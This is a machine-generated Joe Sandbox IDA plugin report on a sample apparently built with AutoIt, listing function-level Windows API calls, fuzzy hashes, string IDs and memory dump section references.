                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: fc02075a160a274533bc807fbfab0d59bae82ffad2f3a84f69e0164cba4a7fb7
                                                  • Instruction ID: 24862c23ef5b2a967b2dcd3cf80ed20b4155ddce2eff410a486da36ba510c2a8
                                                  • Opcode Fuzzy Hash: fc02075a160a274533bc807fbfab0d59bae82ffad2f3a84f69e0164cba4a7fb7
                                                  • Instruction Fuzzy Hash: F3E012B5814608AFCF61AFB4C818AAD7BF1FF4C310F108029F95AE7620CB399241AF40
                                                  APIs
                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 008DB981
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ContainedObject
                                                  • String ID: AutoIt3GUI$Container
                                                  • API String ID: 3565006973-3941886329
                                                  • Opcode ID: f9ab6a6f4619c7fbb570760ac5fe9679a87b11fd841764cb6ff070414c63cd53
                                                  • Instruction ID: 385def276fb0c5e1ddb3fa0db7ff1b400ed7baae93972256ebb6cec51eb75a60
                                                  • Opcode Fuzzy Hash: f9ab6a6f4619c7fbb570760ac5fe9679a87b11fd841764cb6ff070414c63cd53
                                                  • Instruction Fuzzy Hash: B0914A74600205EFDB24DF68C884B6ABBE8FF49710F15856EE94ACB791EB70E840CB50
                                                  APIs
                                                    • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • __wcsnicmp.LIBCMT ref: 008EB298
                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008EB361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                  • String ID: LPT
                                                  • API String ID: 3222508074-1350329615
                                                  • Opcode ID: 944435c9e30236c4335c98753836e9b26ba3361a071ba6a0765d5b462654f59f
                                                  • Instruction ID: 29930a8d20643bfbf1d6240b50f9a776b40aabe9e78ec3aa0f765e2c95add944
                                                  • Opcode Fuzzy Hash: 944435c9e30236c4335c98753836e9b26ba3361a071ba6a0765d5b462654f59f
                                                  • Instruction Fuzzy Hash: BC617E75A00259AFCB14EB99C882EAEB7F4FF09310F15406AF546EB391DB70AE40CB51
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00892AC8
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00892AE1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  • Opcode ID: 4691e1531b1c59f6f7fe5e8df5e659140be95995c920203c5ab9f22f8b721445
                                                  • Instruction ID: cd4bc45ed203dd63084109a171acdfb235f55660e428d87c69c80ea0b3fb06a0
                                                  • Opcode Fuzzy Hash: 4691e1531b1c59f6f7fe5e8df5e659140be95995c920203c5ab9f22f8b721445
                                                  • Instruction Fuzzy Hash: 4F515671428B449BD320BF54D886BAFBBE8FF84314F56885DF1DA810A1DB308529CB27
                                                  APIs
                                                    • Part of subcall function 0088506B: __fread_nolock.LIBCMT ref: 00885089
                                                  • _wcscmp.LIBCMT ref: 008E9AAE
                                                  • _wcscmp.LIBCMT ref: 008E9AC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$__fread_nolock
                                                  • String ID: FILE
                                                  • API String ID: 4029003684-3121273764
                                                  • Opcode ID: 57d9c85f98a7efb5518877f71640aa5dd640af397e1c5b777011da3b8a152af2
                                                  • Instruction ID: b55f01638af0bd5ee055ca729b58c93fc5fa7bc337d282cc8dcf741fd316a279
                                                  • Opcode Fuzzy Hash: 57d9c85f98a7efb5518877f71640aa5dd640af397e1c5b777011da3b8a152af2
                                                  • Instruction Fuzzy Hash: 9F41C871A00659BADF20AAA9DC45FEFB7FDFF46714F000079F940E7181D6B5AA0487A2
                                                  APIs
                                                  • _memset.LIBCMT ref: 008F2892
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008F28C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CrackInternet_memset
                                                  • String ID: |
                                                  • API String ID: 1413715105-2343686810
                                                  • Opcode ID: 30d3eef10b166ece557aa017ae6a36464e3578be5d82149f75d0767f72050694
                                                  • Instruction ID: d7d51b3dddbbf6a0c00f27f2c0a7431c9b70616b4f20b0d18da2b614af90e11d
                                                  • Opcode Fuzzy Hash: 30d3eef10b166ece557aa017ae6a36464e3578be5d82149f75d0767f72050694
                                                  • Instruction Fuzzy Hash: D8311971904119AFCF11AFA5CC85EEEBFB9FF08300F104029F915E6166EB319A56DBA1
                                                  APIs
                                                  • DestroyWindow.USER32(?), ref: 00906D86
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00906DC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: 00b0233cc0bcd1ad94069e0c3ccc938a1b0ec5092f390afc5764aa0607cdfa04
                                                  • Instruction ID: 09b0de5e23dcddd2ad21882fc3c78f839e016efdc68017fb3698498fe28e4ca8
                                                  • Opcode Fuzzy Hash: 00b0233cc0bcd1ad94069e0c3ccc938a1b0ec5092f390afc5764aa0607cdfa04
                                                  • Instruction Fuzzy Hash: 1D314C71210604AEEB109F68CC90BFB77ADFF89724F108619F9A6971D0DB35AC91DB60
                                                  APIs
                                                  • _memset.LIBCMT ref: 008E2E00
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008E2E3B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: b8adf548d3742ba0452a86f380f594cf63c1937067f30d8b789bb0b8108eae7f
                                                  • Instruction ID: c7e31bbc4700930934bc04927a92f3b841bf5624d1e9f36bad94056eacc9540a
                                                  • Opcode Fuzzy Hash: b8adf548d3742ba0452a86f380f594cf63c1937067f30d8b789bb0b8108eae7f
                                                  • Instruction Fuzzy Hash: 1C31F53160035AABEB34CF8AC845BAEBBBDFF07350F140069E985E61A2E7709940CB11
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009069D0
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009069DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: 2af48d7ed09bd01b575b2d05b5dd31e8a570dfe95c8cd285ac197671d67ae845
                                                  • Instruction ID: 304606a0a8aca825db1306215ff216c39dca75e835ab8d5315d839ff8b887197
                                                  • Opcode Fuzzy Hash: 2af48d7ed09bd01b575b2d05b5dd31e8a570dfe95c8cd285ac197671d67ae845
                                                  • Instruction Fuzzy Hash: 5D11C4717002096FEF119F18CC90FBB376EEB893A4F114124F968976D0D7759CA197A0
                                                  APIs
                                                    • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                                    • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                                    • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                                  • GetWindowRect.USER32(00000000,?), ref: 00906EE0
                                                  • GetSysColor.USER32(00000012), ref: 00906EFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: c4899ff4def43e366a21b7430463d8b90f47fd132cbefe4688b263c0c032612d
                                                  • Instruction ID: 9afdffde1efe0fa4cb2cb6489b05f83cc806158ddfd9eb156b66fede5b2440c9
                                                  • Opcode Fuzzy Hash: c4899ff4def43e366a21b7430463d8b90f47fd132cbefe4688b263c0c032612d
                                                  • Instruction Fuzzy Hash: 1721567262420AAFDF04DFA8CC45AFA7BB8FB08314F004628FD55D3290E734E8619B60
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00906C11
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00906C20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: 054edf2fad2047972dea5bab4d4f8034002c94885e9f53f4fdf5128722c50e5c
                                                  • Instruction ID: 75aa8e16dc1c6d460a8e8c0f54ca314947c3d63a794e1104517712e7c8f5ce11
                                                  • Opcode Fuzzy Hash: 054edf2fad2047972dea5bab4d4f8034002c94885e9f53f4fdf5128722c50e5c
                                                  • Instruction Fuzzy Hash: 1A119DB1104208AFEB104E649C45ABA376DEB45378F104724F9A1D71E0C775DCA1AB60
                                                  APIs
                                                  • _memset.LIBCMT ref: 008E2F11
                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008E2F30
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: f4ec5eeb2d6f96b9af7d7e72d8a84d549bfc6bda3d7b7568fd6894e2d0ef6ffb
                                                  • Instruction ID: e6bbc177319bea2ad55c50e7de54a64fbc04fcd14a14ad2ed0ca88664ca51b6a
                                                  • Opcode Fuzzy Hash: f4ec5eeb2d6f96b9af7d7e72d8a84d549bfc6bda3d7b7568fd6894e2d0ef6ffb
                                                  • Instruction Fuzzy Hash: 2A11D0729152A8ABDB34DB59DC04FAD73BDFB03314F0800A1E944F72A0DBB0AE048792
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008F2520
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008F2549
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: 18a3ee20f06361963e23aa350a3164c35057c692c8b9e6b1bbb876e1799bdc8a
                                                  • Instruction ID: 5f685dfd66b93a11b747174bfa0fcb121145ea7eb278ddcab1c5b95ffb077be4
                                                  • Opcode Fuzzy Hash: 18a3ee20f06361963e23aa350a3164c35057c692c8b9e6b1bbb876e1799bdc8a
                                                  • Instruction Fuzzy Hash: E411A3B0541629BEDB24CF618C95EBBFF68FF19755F10812AF60586040D2705991DAF1
                                                  APIs
                                                    • Part of subcall function 008F830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008F80C8,?,00000000,?,?), ref: 008F8322
                                                  • inet_addr.WS2_32(00000000), ref: 008F80CB
                                                  • htons.WS2_32(00000000), ref: 008F8108
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWidehtonsinet_addr
                                                  • String ID: 255.255.255.255
                                                  • API String ID: 2496851823-2422070025
                                                  • Opcode ID: 88c5afda23f399f845d0d14eedeb3de3f29ee176cd36267938e9ba2788637641
                                                  • Instruction ID: e84b4757a84b73ede6a06cec3d551c4a367263ac0642cbf31da4684d217c5ecf
                                                  • Opcode Fuzzy Hash: 88c5afda23f399f845d0d14eedeb3de3f29ee176cd36267938e9ba2788637641
                                                  • Instruction Fuzzy Hash: 36118E35604209EBDB24AF68CC96BBDB368FF44324F108627EA11D7291DA72A8158796
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008D9355
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 0d4ae6e47d7ae9f8d31e9c4d571ac9839b223b81df1609d238b13af8ac131453
                                                  • Instruction ID: 676be7fd9fe7de035c65042f7807d84af8682b96e54f056ac5ac8b52eae803a6
                                                  • Opcode Fuzzy Hash: 0d4ae6e47d7ae9f8d31e9c4d571ac9839b223b81df1609d238b13af8ac131453
                                                  • Instruction Fuzzy Hash: AD019271A45218ABCB08FB68CC918FE7769FF46720B14171AF972A73D1DB3159088751
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 008D924D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: f895e1cb537513f1d80e9baa4763778f9b559211ee3a1b526166164a4fd32616
                                                  • Instruction ID: 9d9a4b41da3daf3cdc487dec8005b54da7583c0ab07e321717e7ece7dea908d0
                                                  • Opcode Fuzzy Hash: f895e1cb537513f1d80e9baa4763778f9b559211ee3a1b526166164a4fd32616
                                                  • Instruction Fuzzy Hash: EB018875A411087BCB14FBA4C992EFF73A8FF55700F140116B952A7281EA11AF089662
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 008D92D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 624940a0eabf024f9b30689e406ba337cc19e0cce5bb182f0e1045e1ac25d5aa
                                                  • Instruction ID: c3f3563ddff2a0bccfa8ba4cfe7850a188941f35e67a77ca6ea5f598dea1bc96
                                                  • Opcode Fuzzy Hash: 624940a0eabf024f9b30689e406ba337cc19e0cce5bb182f0e1045e1ac25d5aa
                                                  • Instruction Fuzzy Hash: 6501A771A8110877CB04FAA4C982EFF77ACFF11700F240216B952E3281DB619F089672
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp
                                                  • String ID: #32770
                                                  • API String ID: 2292705959-463685578
                                                  • Opcode ID: 32bbae155715300a76ae697990138609c402f1d569504755b6d2bac207b1c1c4
                                                  • Instruction ID: 4e44c615ecb08de06a035f6cd8698e41521db2cfe0e428f25dfbdda11a26c415
                                                  • Opcode Fuzzy Hash: 32bbae155715300a76ae697990138609c402f1d569504755b6d2bac207b1c1c4
                                                  • Instruction Fuzzy Hash: D5E0D17390432D1BE7209A999C45F97F7ACFF56771F000167FD14D7050D6609A458BD1
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008D81CA
                                                    • Part of subcall function 008A3598: _doexit.LIBCMT ref: 008A35A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Message_doexit
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 1993061046-4017498283
                                                  • Opcode ID: d5db6197b6d9d7565093e1d5d6d34e46501714ffe08ee7d7e8ec9e4ef6dd81d7
                                                  • Instruction ID: 3dc44904de06decd5431954904960159419bd29fa18a705dc0642bc77b9fb6a6
                                                  • Opcode Fuzzy Hash: d5db6197b6d9d7565093e1d5d6d34e46501714ffe08ee7d7e8ec9e4ef6dd81d7
                                                  • Instruction Fuzzy Hash: 7DD05B333C572D36E61532AC6C0BFC67648DB05B55F004016FB08D59D38DD295D142DA
                                                  APIs
                                                    • Part of subcall function 008BB564: _memset.LIBCMT ref: 008BB571
                                                    • Part of subcall function 008A0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00945158,00000000,00945144,008BB540,?,?,?,0088100A), ref: 008A0B89
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,0088100A), ref: 008BB544
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0088100A), ref: 008BB553
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008BB54E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                  • API String ID: 3158253471-631824599
                                                  • Opcode ID: 4ee0fd7f7a764f9a17dc48eef3dc34594190be57f0764d1a8bad311e5cbbdf7d
                                                  • Instruction ID: 52c460caf7609b61b02a14f4c4cb6e798336a50e8f127e1fe0c0e940173e39ac
                                                  • Opcode Fuzzy Hash: 4ee0fd7f7a764f9a17dc48eef3dc34594190be57f0764d1a8bad311e5cbbdf7d
                                                  • Instruction Fuzzy Hash: 81E039B02147118ED330DF28E5047827AE0FF00754F00892CE456C3750D7B4E508DB62